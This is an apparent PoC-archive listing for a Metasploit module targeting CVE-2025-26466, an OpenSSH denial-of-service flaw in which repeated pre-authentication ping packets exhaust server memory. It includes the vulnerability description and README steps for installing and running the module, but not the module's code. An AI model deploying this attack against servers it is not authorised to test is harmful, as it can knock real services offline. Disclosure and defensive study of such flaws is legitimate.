Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-26466 PoC — Openssh: denial-of-service in openssh

Source
https://github.com/mrowkoob/CVE-2025-26466-msf
Associated Vulnerability
Title:Openssh: denial-of-service in openssh (CVE-2025-26466)
Description:A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packages. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packages, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack.
Description
CVE-2025-26466 - SSH Ping DoS Ruby module for Metasploit Framework
Readme
# CVE-2025-26466 (Metasploit module)

OpenSSH (versions 9.5p1 to 9.9p1) is vulnerable to a memory and CPU exhaustion DoS Attack by sending repeated SSH2_MSG_PING packets (type 192). 
This occurs before authentication, and can result in server lockup due to poor queue/buffer handling.

## More information about that CVE:
```
https://nvd.nist.gov/vuln/detail/CVE-2025-26466
```

 ## How do I run this script?

Copy .rb file into your 'modules' folder, f.e.

`/usr/share/metasploit-framework/modules/auxiliary/dos/ssh`

Run Metasploit console and search for the module.

```
msfconsole
search ping_dos
```

## References

- https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466


## Disclaimer

I am sharing this just for educational purposes, you shall not use it on infrastructure you are not authorized to.

## Issues

That's my first project shared on GitHub. Feel free to leave comments about it, so I can learn and make it better.
File Snapshot

 [4.0K]  /data/pocs/194b3e29f7965628f38c95f7beef1f88e9bf12db
├── [2.2K]  ping_dos.rb
└── [1.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →